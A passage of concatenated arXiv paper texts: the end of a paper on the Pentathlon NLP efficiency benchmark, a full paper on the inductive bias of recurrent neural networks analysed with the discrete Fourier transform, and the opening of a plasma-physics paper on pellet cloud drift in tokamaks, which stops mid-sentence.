(2021) evaluates energy efficiency as a proxy of time and cost, while Pentathlon evaluates multiple different efficiency metrics in a realistic way. Long-Range Arena Tay et al. (2021) builds a set of synthesized tasks to evaluate the long-range capabilities of NLP models in terms of generalization and computational efficiency including speed and memory footprint. Another line of work has studied application- or task-specific efficiency such as trade-offs between accuracy and energy consumption for long context NLP models Ang et al. (2022), inference energy competition for models on SuperGLUE Wang and Wolf (2020) or storage efficiency for open domain question answering Min et al. (2021). Most related to Pentathlon, MLPerf targets inference efficiency across various real-world scenarios Reddi et al. (2020); Banbury et al. (2020). While MLPerf aims to stimulate building more efficient hardware platforms, Pentathlon incentivizes algorithmic innovations, controlling the hardware. Hosted on an in-house machine, Pentathlon can accurately measure inference energy consumption, which was impossible for previous benchmark efforts. ## 5 Conclusions We present Pentathlon, a benchmark for holistic and realistic evaluation of inference efficiency. Pentathlon targets multiple aspects of efficiency including latency, throughput, memory overhead, number of parameters, and energy consumption, on a strictly-controlled hardware platform. Integrating evaluation with Pentathlon is seamless and can drastically reduce the workload to make fair and reproducible efficiency comparisons. Pentathlon offers both testing in real-world application scenarios and a standardized platform for comparison between any two submissions. We establish this tool for NLP models but offer flexible extensions to additional tasks and scenarios. We envision Pentathlon to provide a new lens on testing algorithmic innovations by lowering the barrier to entry for evaluating efficiency and characterizing environmental impact of future models.
2305.09178
Empirical Analysis of the Inductive Bias of Recurrent Neural Networks by Discrete Fourier Transform of Output Sequences
A unique feature of Recurrent Neural Networks (RNNs) is that it incrementally processes input sequences. In this research, we aim to uncover the inherent generalization properties, i.e., inductive bias, of RNNs with respect to how frequently RNNs switch the outputs through time steps in the sequence classification task, which we call output sequence frequency. Previous work analyzed inductive bias by training models with a few synthetic data and comparing the model's generalization with candidate generalization patterns. However, when examining the output sequence frequency, previous methods cannot be directly applied since enumerating candidate patterns is computationally difficult for longer sequences. To this end, we propose to directly calculate the output sequence frequency for each model by regarding the outputs of the model as discrete-time signals and applying frequency domain analysis. Experimental results showed that Long Short-Term Memory (LSTM) and Gated Recurrent Unit (GRU) have an inductive bias towards lower-frequency patterns, while Elman RNN tends to learn patterns in which the output changes at high frequencies. We also found that the inductive bias of LSTM and GRU varies with the number of layers and the size of hidden layers.
Taiga Ishii, Ryo Ueda, Yusuke Miyao
2023-05-16T05:30:13Z
http://arxiv.org/abs/2305.09178v1
Empirical Analysis of the Inductive Bias of Recurrent Neural Networks by Discrete Fourier Transform of Output Sequences ###### Abstract A unique feature of Recurrent Neural Networks (RNNs) is that it incrementally processes input sequences. In this research, we aim to uncover the inherent generalization properties, i.e., inductive bias, of RNNs with respect to how frequently RNNs switch the outputs through time steps in the sequence classification task, which we call output sequence frequency. Previous work analyzed inductive bias by training models with a few synthetic data and comparing the model's generalization with candidate generalization patterns. However, when examining the output sequence frequency, previous methods cannot be directly applied since enumerating candidate patterns is computationally difficult for longer sequences. To this end, we propose to directly calculate the output sequence frequency for each model by regarding the outputs of the model as discrete-time signals and applying frequency domain analysis. Experimental results showed that Long Short-Term Memory (LSTM) and Gated Recurrent Unit (GRU) have an inductive bias towards lower-frequency patterns, while Elman RNN tends to learn patterns in which the output changes at high frequencies. We also found that the inductive bias of LSTM and GRU varies with the number of layers and the size of hidden layers. ## 1 Introduction In this research, we aim to uncover the inherent generalization properties, i.e., inductive bias, of RNNs with respect to how frequently RNNs switch the outputs through time steps in the sequence classification task, which we call _output sequence frequency_ (Figure 1). In supervised learning settings, a model is trained with finite input-output examples \(\{(x_{0},\,y_{0}),\dots,(x_{n},\,y_{n})\}\) and then tested with unseen input-output pairs. The models that achieve high accuracy on test data are often said to "generalize well". However, the important point is that function \(f\) that satisfies \(f(x_{i})=y_{i}\) cannot be uniquely determined by finite train examples. This entails that if a model generalizes well to a certain function \(f\), then the model hardly generalizes to another function \(f^{\prime}\) that has different outputs for the same unseen inputs, i.e., \(f(x_{\mathrm{test}})\neq f^{\prime}(x_{\mathrm{test}})\) but is consistent with the same train examples; \(f^{\prime}(x_{i})=y_{i}\). Therefore, it is crucial to understand what kind of functions a model inherently prefers to learn, which is referred to as **inductive bias**(White and Cotterell, 2021; Kharitonov and Chaabouni, 2020; Deletang et al., 2022; Lovering et al., 2020). Our target is Recurrent Neural Network (RNN): a well-known deep learning architecture. A key feature of RNN is that it processes the input incrementally and predicts the output at each time step, producing a sequence of outputs. This is different from other deep learning architectures, e.g., Feed Forward Network (FFN), Convolutional Neural Network (CNN), and Transformers (Vaswani et al., Figure 1: An example showing a train dataset and two candidate generalization patterns, each showing a different output sequence frequency. Here, ”aababba” is the input sequence, and there are four binary train labels \(0,1,1,0\) each corresponding to the prefix of length \(2,3,5,6\). 2017). Due to the incremental processing feature of RNNs, the inputs can be of variable length; RNNs have been used for various tasks in natural language processing, such as sentence classification and text generation. It has also been used as a subcomponent of more complex architectures (Dyer et al., 2016) and to simulate human sequential processing (Steinert-Threlkeld and Szymanik, 2019). Variants of RNN architectures have been proposed so far. The most basic one is the Elman RNN (Elman, 1990). Later, more complex architectures, such as LSTM (Hochreiter and Schmidhuber, 1997) and GRU (Cho et al., 2014), have been proposed to improve modeling long-term dependencies. Although deep learning models, including RNNs, are said to be high-performance models, they are essentially black boxes, and it is not clear what inductive bias they may have. In this research, in order to analyze the inductive bias of RNNs, we propose to calculate the output sequence frequency by regarding the outputs of RNNs as discrete-time signals and applying frequency domain analysis. Specifically, we apply discrete Fourier transform (DFT) to the output signals and compute the dominant frequencies to grasp the overall output patterns. Inductive bias is not straightforward to analyze since it can be affected by various factors such as the task, dataset, and training method; theoretical analysis has been limited to simple architecture such as FFN (Rahaman et al., 2019; Valle-Perez et al., 2019). Therefore, empirical studies have been conducted to clarify the inductive bias in various tasks and settings, such as language modeling (White and Cotterell, 2021), sequence classification (Lovering et al., 2020), and sequence-to-sequence (Kharitonov and Chaabouni, 2020). These works approached the problems by designing synthetic datasets and testing several generalization patterns. However, when examining the output sequence frequency, we cannot directly apply these previous methods since enumerating exponentially many output sequence patterns in longer sequences is computationally difficult. To this end, our method makes use of frequency domain analysis to directly calculate the output sequence frequencies and avoid enumerating the candidate generalization patterns. In the experiment, we randomly generated \(500\) synthetic datasets and trained models on a few data points (Figure 1). As a result, we found: * LSTM and GRU have an inductive bias such that the output changes at lower frequencies compared to Elman RNN, which can easily learn higher frequency patterns, * The inductive bias of LSTM and GRU varies with the number of layers and the size of hidden layers. ## 2 Background ### Inductive Bias Analysis Inductive bias analysis is usually performed by constructing synthetic datasets. This is because data from real tasks are complex and intertwined with various factors, making it difficult to determine what properties of the dataset affect the behavior of the model. For example, White and Cotterell (2021) targeted LSTM and Transformer and investigated whether easy-to-learn languages differ depending on their typological features in language modeling. White and Cotterell (2021) used Context Free Grammar (CFG) to construct parallel synthetic language corpora with controlled typological features. They trained models on each language and computed their perplexities to find that LSTM performs well regardless of word order while the transformer is affected. Another more synthetic example is Kharitonov and Chaabouni (2020). Kharitonov and Chaabouni (2020) targeted LSTM, CNN, and Transformer. They designed four synthetic tasks in the sequence-to-sequence framework and trained models on very small datasets (containing 1\(\sim\)4 data points). To examine the inductive biases of the models, they prepared a pair of candidate generalization patterns, such as COUNT and MEMORIZATION, for each task and compared the models' preference over the candidate patterns by calculating the Minimum Description Length (Rissanen, 1978). Using extremely small train datasets makes it possible to restrict the information models can obtain during training and analyze the models' inherent inductive bias in a more controlled setup. In this research, we take a similar approach as (Kharitonov and Chaabouni, 2020), restricting the train data to extremely small numbers. However, we cannot directly apply the methods of Kharitonov and Chaabouni (2020) because the approach of comparing with candidate generalization patterns can be impractical in our case. Specifically, when examining the output sequence frequency, it is necessary to feed the models with longer se quences in order to analyze a wide range of frequencies from low to high; there are exponentially many patterns with the same number of output changes in longer sequences, which makes it difficult to exhaustively enumerate the candidate generalization patterns. Therefore, instead of preparing candidate generalization patterns, we directly calculate the output sequence frequency for each model by regarding the outputs of the model as discrete-time signals and applying frequency domain analysis. ### Frequency Domain Analysis Discrete Fourier Transform (DFT) is a fundamental analysis technique in digital signal processing. Intuitively, DFT decomposes a signal into a sum of finite sine waves of different frequencies, allowing one to analyze what frequency components the original signal consists of. The DFT for a length \(N\) discrete-time signal \(f[0],\ldots,f[N-1]\) is defined by the following equation: \[F[k]\;=\;\sum_{n=0}^{N-1}f[n]\exp\left(-\sqrt{-1}\frac{2\pi}{N}kn\right). \tag{1}\] When \(f[n]\) is a real-value signal, it is sufficient to consider only \(k\in\{1,\ldots,\frac{N}{2}\}\).1 Here, \(k=1\) corresponds to the lowest frequency component and \(k=\frac{N}{2}\) to the highest. Footnote 1: This is due to the periodicity of \(\exp(-\sqrt{-1}\frac{2\pi}{N}kn)\). Furthermore, we do not take into account the \(k=0\) term since it is called a DC term and works as an offset. One useful measure for analyzing the property of the signal \(f[n]\) is the dominant frequency (Ng and Goldberger, 2007). In short, dominant frequency is the frequency component of maximum amplitude and is expected to represent the general periodic pattern of the original signal \(f[n]\). The dominant frequency \(\omega_{\mathrm{dom}}\;=\;\frac{2\pi}{N}k_{max}\), where \(k_{max}\;=\;\arg\max\{|F[k]|\}\). ## 3 Methods ### Task To analyze the output sequence frequency, i.e., how frequently the output changes through time steps, we focus on a simple case of binary sequence classification task: the inputs are the prefixes of a binary sequence \(s\in\{\mathrm{a},\mathrm{b}\}^{*}\). Specifically, given a binary sequence \(s\in\{\mathrm{a},\mathrm{b}\}^{*}\), the input space \(\mathcal{I}\) and the output space \(\mathcal{O}\) are defined as follows: \[\mathcal{I} \;=\;\{s_{0:i}\:|\:i=0,\ldots|s|-1\}, \tag{2}\] \[\mathcal{O} \;=\;\{(1-p,p)\:|\:p\in[0,1]\}, \tag{3}\] where \(\mathcal{O}\) is a set of categorical distributions over the binary labels \(\{0,1\}\), and \(p\) denotes the probability of predicting label \(1\). Without loss of generality, we can only consider the model's output probability of predicting label \(1\) for the sequence \(s_{0:i}\), which we denote by \(\mathcal{M}(s_{0:i})\). In this way, we can regard the model's output sequence \(\mathcal{M}(s_{0:0}),\ldots,\mathcal{M}(s_{0:|s|-1})\) as a discrete-time signal taking values in \([0,1]\). ### Train Dataset Figure 2 shows an intuitive illustration of our dataset construction. Given a sequence \(s\), we randomly generate the binary labels \(y_{0:|s|-1}\), where each \(y_{i}\) is the label assigned to the prefix \(s_{0:i}\). When two successive labels \(y_{i}\) and \(y_{i+1}\) differ, we say there is a _label change_ (e.g., \(y_{9}\) and \(y_{10}\) in Figure 2).2 We then make a train dataset \(\mathcal{D}\) by taking instances where the labels change: \(\{(s_{0:i},y_{i}),(s_{0:i+1},y_{i+1})\:|\:y_{i}\neq y_{i+1}\}\). For example, in Figure 2, the train data \(\mathcal{D}\) contains \(\{(\mathrm{aa},0)\:(\mathrm{aab},1)\:(\mathrm{aababba},1)\:(\mathrm{aababba},0 ),\ldots\}\). Note that the original labels \(y_{0:|s|-1}\) can be uniquely recovered from \(\mathcal{D}\) simply by _interpolating_ or _extending_ the labels for other prefixes. Footnote 2: Similarly, we use _output change_ for output sequences. The procedure is formalized as follows: 1. Sample a sequence \(s\in\{0,1\}^{N}\), where \(N\) is Figure 2: Illustration of train dataset construction. The train dataset contains only the instances corresponding to the label changes. the length of the sequence, 2. Sample the number of label changes \(m\in\{1,\ldots M\}\), where \(M\) is the maximum number of label changes, 3. Sample the labels \(y_{0:|s|-1}\) so that all the \(m\) label changes do not overlap3, i.e. \(\forall i,j.\ i<j\wedge y_{i}\neq y_{i+1}\wedge y_{j}\neq y_{j+1}\Rightarrow i+1<j\), Footnote 3: This condition ensures that the labels in the train dataset are balanced. 4. Create a dataset as \[\mathcal{D}\ =\ \{(s_{0:i},y_{i}),(s_{0:i+1},y_{i+1})\,|\,y_{i}\neq y_{i+1}\}.\] By training models on random input sequences \(s\), we expect the model predictions to represent the inherent generalization property of the model. ### Evaluation Metrics For the analysis, we apply two evaluation metrics. #### 3.3.1 Test Cross-entropy Loss First, we compare the model's output sequence \(\mathcal{M}(s_{0:0}),\ldots,\mathcal{M}(s_{0:|s|-1})\) with the original labels \(y_{0:|s|-1}\) by calculating test cross-entropy loss \(\mathcal{L}_{\mathrm{CE}}\). Intuitively, near-zero \(\mathcal{L}_{\mathrm{CE}}\) indicates that the model generalizes to simply _interpolate_ or _extend_ the training labels since we constructed the train datasets so that the original labels can be recovered by interpolation, as described in section 3.2. The loss is formalized as: \[\begin{split}\mathcal{L}_{\mathrm{CE}}\ =&-\frac{1}{| \mathcal{T}|}\sum_{i\in\mathcal{T}}(y_{i}\ln(\mathcal{M}(s_{0:i}))\\ +(1&-y_{i})\ln(1-\mathcal{M}(s_{0:i}))),\end{split} \tag{4}\] where \(\mathcal{T}=\{i\,|\,(s_{0:i},\_)\notin\mathcal{D}\}\) is the set of test data indices. #### 3.3.2 Dominant Frequency In case \(\mathcal{L}_{\mathrm{CE}}\) is high, we consider the model's output sequence \(\mathcal{M}(s_{0:0}),\ldots,\mathcal{M}(s_{0:|s|-1})\) as a discrete-time signal and apply frequency domain analysis to look into the model's behavior. More specifically, we apply DFT to the output signal and obtain the dominant frequency \(\omega_{\mathrm{dom}}\). The dominant frequency \(\omega_{\mathrm{dom}}\) is calculated by simply replacing \(f[n]\) in Equation 1 with \(\mathcal{M}(s_{0:n})\). ### Experiment Settings Here, we describe the basic settings of our experiment. We use well-known basic RNN architectures: LSTM [16], GRU [10], and Elman RNN [1]. For the decoding, we use a linear decoder without bias followed by a softmax function. We try 4 combinations of hyperparameters: \((\textit{num\_layers},\ hidden\_size)\in\{(1,200),\ (2,200),\ (3,200),\ (2,2000)\}\), where \(\textit{num\_layers}\) denotes the number of layers, and \(\textit{hidden\_size}\) denotes the size of hidden layers.4 Footnote 4: For other hyperparameters and parameter initialization, we used the default settings of PyTorch [https://pytorch.org/](https://pytorch.org/). For optimization, we train models to minimize the average cross-entropy loss by gradient descent using Adam [11] with a learning rate of \(1.0\times 10^{-4}\) for \(1000\) epochs.5 Footnote 5: Since the maximum size of train data is 10 in our settings, all the data are put in a batch during the training. Finally, we randomly generate \(500\) train datasets with \(N\,=\,100,M\,=\,5\) and train \(10\) models with different random seeds for each dataset, architecture, and parameter setting. Note that this sparse setting (\(10:90\) train-test data ratio at maximum) keeps the hypothesis space large and thus enables us to analyze the inductive bias of the models as described in section 2.1. Training all the models took around 30 hours using 8 NVIDIA A100 GPUs. ## 4 Findings ### Models Do Not Learn to Interpolate In order to see if the models generalize simply to interpolate the given labels, we calculate the median test cross-entropy loss of the multiple models trained for each dataset (Figure 3). The dotted vertical line shows the random baseline loss Figure 3: The median test cross-entropy loss counts for LSTM, GRU, and Elman RNN with \((\textit{num\_layers},\ hidden\_size)=(2,200)\). The dotted vertical line shows the random baseline loss of \(-\ln(\frac{1}{2})\). of \(-\ln(\frac{1}{2})\approx 0.7\). As can be seen in Figure 3, the median test cross-entropy loss is higher than the random baseline for most datasets for all of LSTM, GRU, and Elman RNN. This indicates that, in most cases, none of the LSTM, GRU, or Elman RNN learns to interpolate in this extremely simple setup, where only the label-changing part is given as training data. We also observe a similar trend in other hyperparameter settings; The test cross-entropy losses for other settings are shown in Appendix A. ### Architectural Difference Now that the test cross-entropy loss has revealed that the patterns learned by the models contain more output changes than the original pattern in the train data, the next step is to see if there are any architecture-specific trends in the output sequence patterns. We calculate the dominant frequency for each model and take the median over the models trained on the same dataset. Figure 4 shows the distribution of median dominant frequencies for LSTM, GRU, and Elman RNN with different hyperparameters. It is clear that, in all settings, LSTM and GRU tend to learn lower-frequency patterns, while the dominant frequencies of Elman RNN tend to be higher. Comparing LSTM and GRU, LSTM has slightly lower-frequency patterns for \(hidden\_size=200\) (Figure 4 (a, b, c)), though the difference is not as clear for \(hidden\_size=2000\) (Figure 4 (d)). An example of sequential outputs of LSTM and Elman is shown in Figure 5. The top rows show the actual model outputs for a specific sequence, and the bottom rows show the DFT of model outputs. In this example, only 4 labels \(0,1,1,0\) are given to the prefixes of length \(60,61,84,85\). It is clear that both LSTM and Elman learn periodic patterns but do not learn to interpolate the given train labels. Besides, it is also notable that LSTMs indeed learn lower Figure 4: The median dominant frequency counts for LSTM, GRU, and Elman RNN with different hyperparameters. frequency patterns compared to Elman RNNs. ### Effect of Hyperparameters Here, we describe how hyperparameters affect the observed inductive biases. #### 4.3.1 Number of Layers Figure 6 shows the median dominant frequencies of \(num\_layers=1,2,3\) for LSTM, GRU, and Elman RNN. As for LSTM, it can be seen that the proportion of patterns in the lower-frequency domain tends to increase as the number of layers increases. In other words, despite the increased complexity of the models, LSTMs tend to learn simpler patterns (in the sense that the output changes less). A similar trend is observed for GRU, although not as clear as for LSTM. On the other hand, Elman RNN does not show such apparent differences. #### 4.3.2 Hidden Layer Size Figure 7 shows the median dominant frequencies of \(hidden\_size=200,2000\) for LSTM, GRU, and Elman RNN. Although the trend is not so clear, for LSTM and GRU, the counts are slightly larger for \(\omega_{\mathrm{dom}}=0.5\sim 1.0\) when \(hidden\_size=2000\), while the counts are larger for \(\omega_{\mathrm{dom}}=0.0\sim 0.5\) when \(hidden\_size=200\). This is rather the opposite trend from that of \(num\_layers\). However, the above trend does not seem to appear in Elman RNN. ## 5 Discussion and Limitation ### Expressive Capacity and Output Sequence Frequency Our results do not align with the expressive capacity of RNNs reported in previous work (Merrill et al., 2020; Weiss et al., 2018). Merrill et al. (2020); Weiss et al. (2018) formally showed that LSTM is strictly more expressive than GRU and Elman RNN. On the other hand, in our experiments, LSTM and GRU show a bias toward lower frequencies, while Elman RNN, which has the same expressive capacity as GRU, according to (Merrill et al., 2020), shows an opposite bias toward higher frequencies. Note that the expressive capacity and the inductive bias of a model are basically different concepts. This is because expressive capacity is the theoretical upper bound on the functions a model can represent with all possible combinations of its parameters, regardless of the training procedure. In contrast, inductive bias is the preference of functions that a model learns from finite train data, possibly depending on training settings. However, they are not entirely unrelated because a function that is impossible to learn in terms of expressive capacity will never be learned, which can emerge as inductive bias. We conjecture that the difference Figure 5: An example of LSTM and Elman RNN with \((num\_layers,\ hidden\_size)=(2,200)\). The top rows show the actual model outputs for a specific sequence, and the bottom rows show the DFT of model outputs. In this example, 4 labels \(0,1,1,0\) are assigned to the prefixes of length \(60,61,84,85\). The Red and blue vertical lines correspond to the labels \(0,1\), respectively. The results of 10 models with different random seeds are shown. Figure 6: The median dominant frequencies of \(num\_layers=1,2,3\) for LSTM, GRU, and Elman RNN with \(hidden\_size=200\). between the expressive capacity and the observed inductive bias is due to the simplicity of our experiment setting. This difference is not a negative result: It indicates that inductive bias in such a simple setting is effective in observing detailed differences that cannot be captured by expressive capacity. ### Randomness of Outputs Previous study showed that FFNs hardly learn random functions since they are inherently biased toward simple structured functions Valle-Perez et al. (2019). We can find a similar trend for RNNs in our experimental results. In other words, by regarding the outputs of RNNs as discrete-time signals, we can confirm that the signals are not random, i.e., white noises. If we assume that the output signals of the RNNs are random, the dominant frequency should be uniformly distributed from low to high-frequency regions. Therefore, the biased distribution in Figure 4 indicates that the outputs of the RNNs are not random signals. This is also clear from the example outputs in Figure 5, where the models show periodic patterns. ### Practical Implication For LSTM and GRU, we observed different inductive biases between increasing the number of layers and hidden layer size. Previous study that investigated whether RNNs can learn parenthesis also reported that LSTM and GRU behaved differently when the number of layers and the hidden layer size were increased Bernardy (2018). Although the tasks are different, our findings align with the previous work. From a practical point of view, these findings suggest that it may be more effective to increase the number of layers than to increase the hidden layer size depending on the target task. Besides, the fact that LSTM and GRU, which are known to be "more practical" than Elman RNN, tend to learn lower frequency patterns may support the idea that output sequence frequency aligns with "practical usefulness." Furthermore, a concept similar to output sequence frequency has been proposed as a complexity measure in sequence classification: sensitivity Hahn et al. (2021). While output sequence frequency focuses on the change in output over string length, sensitivity focuses on the change in output when a string is partially replaced, keeping its length. It would be an interesting future direction to examine the validity of inductive biases in output sequence frequency as an indicator of complexity and practical usefulness. ### Limitation There are some dissimilarities between our experimental setup and practical sequence classification tasks: * The task is limited to the binary classification of binary sequences, * Models are trained only on prefixes of a sequence, * The number of train data is extremely small. Therefore, in order to accurately estimate the impact of our findings on the actual task, it is necessary to expand from sequence to language in a multi-label setting with a larger vocabulary. Due to the computational complexity, we only tried 4 combinations of hyperparameters. However, it is still necessary to exhaustively try combinations of hyperparameters for a more detailed analysis. ## 6 Conclusion This study focuses on inductive bias regarding the output sequence frequency of RNNs, i.e., how often RNNs tend to change the outputs through time steps. To this end, we constructed synthetic datasets and applied frequency domain analysis by regarding the model outputs as discrete-time signals. Experimental results showed that LSTM and GRU have inductive biases towards having low output sequence frequency, whereas Elman RNN tends to learn higher-frequency patterns. Such differences in inductive bias could not be captured by the expressive capacity of each architecture alone. This indicates that inductive bias analysis on synthetic datasets is an effective method for studying model behaviors. By testing different hyperparameters, we found that the inductive biases of LSTM and GRU vary with the number of layers and the hidden layer size in different ways. This confirms that when increasing the total number of parameters in a model, it would be effective not only to increase the hidden layer size but also to try various hyperparameters, such as the number of layers. Although the experimental setting was limited to simple cases, we believe this research shed some light on the inherent generalization properties of RNNs and built the basis for architecture selection and design.
2301.12911
Drift of ablated material after pellet injection in a tokamak
Pellet injection is used for fuelling and controlling discharges in tokamaks, and it is foreseen in ITER. During pellet injection, a movement of the ablated material towards the low-field side (or outward major radius direction) occurs because of the inhomogeneity of the magnetic field. Due to the complexity of the theoretical models, computer codes developed to simulate the cross-field drift are computationally expensive. Here, we present a one-dimensional semi-analytical model for the radial displacement of ablated material after pellet injection, taking into account both the Alfv\'en and ohmic currents which short-circuit the charge separation creating the drift. The model is suitable for rapid calculation of the radial drift displacement, and can be useful for e.g. modelling of disruption mitigation via pellet injection.
O. Vallhagen, I. Pusztai, P. Helander, S. L. Newton, T. Fülöp
2023-01-30T14:13:22Z
http://arxiv.org/abs/2301.12911v2
# Drift of ablated material after pellet injection in a tokamak ###### Abstract Pellet injection is used for fuelling and controlling discharges in tokamaks, and it is foreseen in ITER. During pellet injection, a movement of the ablated material towards the low-field side (or outward major radius direction) occurs because of the inhomogeneity of the magnetic field. Due to the complexity of the theoretical models, computer codes developed to simulate the cross-field drift are computationally expensive. Here, we present a one-dimensional semi-analytical model for the radial displacement of ablated material after pellet injection, taking into account both the Alfven and ohmic currents which short-circuit the charge separation creating the drift. The model is suitable for rapid calculation of the radial drift displacement, and can be useful for e.g. modelling of disruption mitigation via pellet injection. ## 1 Introduction Pellet injection is an effective tool for modifying the density profile in fusion devices, and can be used for both fuelling and plasma control (Pegourie, 2007). It has also been employed successfully to mitigate transient events in tokamaks, e.g. edge localized modes (Lang _et al._, 2015) and disruptions (Revx _et al._, 2021). The use of pellets to control such events is also planned for ITER (Baylor _et al._, 2009; Hollmann _et al._, 2015; Lehnen _et al._, 2018). In order to assess the performance of pellet injection schemes for future tokamaks, such as ITER, it is important that accurate estimates of the modified density profile created by the pellets are included in the modelling tools used to simulate such events. This can only be achieved through an understanding of the underlying physics of the mass deposition after pellet injection. When a pellet is injected into a hot, magnetically confined plasma, it travels through the plasma in solid form while the outer layers are continuously ablated by the energy flux from the hot background plasma, resulting in material being deposited along the pellet trajectory. The cloud of ablated material initially has a cold dense structure - a plasmoid - which drifts towards the low-field side of the torus. This is caused by the charge separation that takes place due to electron and ion drifts in the inhomogeneous magnetic field, leading to the build-up of a vertical electric field, and the resulting \(\mathbf{E}\times\mathbf{B}\)-drift moves the ablated material across magnetic field lines (Parks _et al._, 2000; Rozhansky _et al._, 2004; Pegourie _et al._, 2006). The strength of the electric field, and hence the drift velocity, is determined by the mechanisms which can short-circuit the charge separation inside the plasmoid. The dominant ones are the emission of Alfven waves from the two ends of the plasmoid (Parks _et al._, 2000) and the flow of ohmic current parallel to the field lines (Pegourie _et al._, 2006). Mathematically, the evolution of the pellet cloud is governed by a vorticity equation similar to that used to describe so-called blob transport in the plasma scrape-off layer (Krasheninnikov _et al._, 2008). There is a wealth of experimental evidence for radial cross-field drift following pellet injection in current tokamaks and stellarators, e.g. in DIII-D (Baylor _et al._, 2007), ASDEX Upgrade (Lang _et al._, 1997), FTU (Terranova _et al._, 2007), MAST (Garzotti _et al._, 2010) and W7-X (Baldzuhn _et al._, 2019). However, due to the complexity of the theoretical models, computer codes developed to simulate the cross-field drift are computationally expensive (Strauss & Park, 1998, 2000; Aiba _et al._, 2004; Ishizaki & Nakajima, 2011). Therefore, simplified scaling laws, based on current experimental observations, are often used (Baylor _et al._, 2007; Koechl _et al._, 2018). Such expressions are of limited use for modelling ITER plasmas, which will have much higher temperatures and magnetic fields. In many cases, e.g. in the currently used disruption mitigation models, the radial drift of the pellet cloud is neglected altogether, for simplicity (Vallhagen _et al._, 2022). This is particularly problematic in the case of pure hydrogen pellets (Matsuyama, 2022), as their clouds can reach significant over-pressure due to negligible radiative energy losses, thus their drifts can be large and therefore affect the pellet penetration and material deposition substantially. The purpose of this paper is to develop a semi-analytical model for the cross-field drift motion of the ionized plasmoid, taking into account both the Alfven and ohmic currents. Our aim is to extract the key physical mechanisms described by the codes mentioned above and condense the result into a computationally efficient model. We consider current conservation directly, rather than formulating a vorticity equation for the system, generalising the description of the parallel connection of the ohmic current, and clarifying elements present in the existing literature. Factors such as the assumed shape of the plasmoid and our neglect of its structure along the magnetic field will quantitatively affect the plasmoid dynamics, but will not affect the qualitative nature of the results presented here. ## 2 Physical model The motion of the plasmoid arises because of an \(\mathbf{E}\times\mathbf{B}\)-drift in the direction of the major radius; the electric field builds up due to the current from the magnetic (curvature + \(\nabla B\)) drift of the particles, while the time-variation of this electric field gives rise to a partially cancelling polarization drift current. The total radial shift is determined by the drift velocity reached and its duration, which is approximately the time it takes for the cloud to expand one connection length along the field lines (\(t\sim\pi R_{\rm m}q/c_{s}\), where \(R_{\rm m}\) is the major radius, \(c_{s}\) is the sound speed and \(q\) is the safety factor or inverse of the rotational transform of the magnetic field). At this time, magnetic drift currents in the outboard and inboard portions of the cloud cancel out (analogously to a tokamak equilibrium). In order to mathematically describe the pellet dynamics, we formulate the current-conservation equation for the system, describing the balance between the divergent parts of the currents necessary to maintain quasineutrality. Working within a single-fluid formalism, we introduce the mass density \(\rho\), the mass flow velocity \(\mathbf{v}\), which appears in the total time derivative \(d_{t}=\partial_{t}+\mathbf{v}\cdot\nabla\), the total pressure including the electron and ion pressure components \(p=p_{e}+p_{i}\), as well as the current density and the magnetic field vectors, \(\mathbf{j}\) and \(\mathbf{B}\). In addition, \(\mathbf{B}=\mathbf{b}B\) with the unit vector \(\mathbf{b}\), the curvature vector of the field lines is \(\boldsymbol{\kappa}=\mathbf{b}\cdot\nabla\mathbf{b}\), and \(\mu_{0}\) denotes the vacuum permeability. The pellet cloud has higher pressure than the surrounding plasma since it is continuously heated by hot electrons from the latter (Aleynikov _et al._, 2019; Runov _et al._, 2021; Arnold _et al._, 2021). A current perpendicular to the magnetic field lines arises in response to this excess pressure, but we note that the dynamics involved in the drift of the plasmoid is slower than the timescale of compressional Alfven waves, so that the largest terms in the magnetohydrodynamic (MHD) force balance equation, \[\rho\frac{d\mathbf{v}}{dt}=\mathbf{j}\times\mathbf{B}-\nabla p, \tag{1}\] describe an approximately static force balance between the plasma pressure and the magnetic field. The total current takes the form \[\mathbf{j}=j_{\parallel}\mathbf{b}+\frac{\mathbf{B}\times\nabla p}{B^{2}}+ \frac{\rho}{B}\mathbf{b}\times\frac{d\mathbf{v}}{dt}, \tag{2}\] and the divergence of the diamagnetic current, the second term on the right, describes the charge accumulation due to the magnetic drifts. This is approximately given by \[\nabla\cdot\left(\frac{\mathbf{B}\times\nabla p}{B^{2}}\right)=\nabla\cdot \left[p\nabla\times\left(\frac{\mathbf{B}}{B^{2}}\right)\right]\approx\nabla \cdot\left(2p\frac{\mathbf{b}\times\nabla B}{B^{2}}\right)\equiv\nabla\cdot \mathbf{j}\mathbf{v}_{B}. \tag{3}\] Using \((\mathbf{b}\times\nabla B)/B=\mathbf{b}\times\boldsymbol{\kappa}\) we can write the expression for current conservation in the form \[0=\nabla\cdot\mathbf{j}\approx\nabla\cdot\left[j_{\parallel}\mathbf{b}+\frac {\mathbf{b}}{B}\times\left(2p\boldsymbol{\kappa}+\rho\frac{d\mathbf{v}}{dt} \right)\right]. \tag{4}\] The time-dependent term in (4) is the current due to the polarization drift, \[\mathbf{j}_{\hat{E}}=\rho\frac{\mathbf{b}}{B}\times\frac{d\mathbf{v}}{dt}.\] The resistive-MHD Ohm's law \(\mathbf{E}+(\mathbf{v}\times\mathbf{B})=\eta\mathbf{j}\) implies that in the limit of modest resistivity \(\eta\), the perpendicular mass flow \(\mathbf{v}_{\perp}\) is dominated by \(\mathbf{E}\times\mathbf{B}\) motion. For the low-frequency process of interest inside the pellet cloud, the electric field is electrostatic \(\mathbf{E}=-\nabla\phi\), with the electrostatic potential \(\phi\), and thus we write the cross-field velocity as \(\mathbf{v}_{\perp}\approx(\mathbf{b}\times\nabla\phi)/B\). The parallel current (\(j_{\parallel}\)) must adjust to make the total current divergence free; that is \[\nabla\cdot\mathbf{j}=\nabla\cdot\left[j_{\parallel}\mathbf{b}+\mathbf{j}_{ \nabla B}+\mathbf{j}_{\hat{E}}\right]=0.\] Eliminating the contribution which describes the balance of the diamagnetic and parallel currents in the background equilibrium plasma, we are left with the perturbation of the current continuity equation driven by the excess pressure of the plasmoid. In the very early phase of plasmoid acceleration, \(\mathbf{j}_{\nabla B}\) is approximately balanced by \(\mathbf{j}_{\hat{E}}\). At such short times, the length of the pellet cloud is much shorter than the distance around the torus, \(t\ll R_{m}q/c_{s}\), and the plasmoid is thus poloidally and toroidally localised. If the aspect ratio of the torus is large, the curvature vector of the magnetic field is approximately \(\boldsymbol{\kappa}=-\hat{R}/R_{m}\), where \(R_{m}\) is the major radius and \(\hat{R}\) the unit vector in the direction of increasing major radius. For convenience we introduce the unit vector \(\hat{Y}=\mathbf{b}\times\hat{R}\), so the direction of \(\mathbf{j}\mathbf{v}_{B}\) is 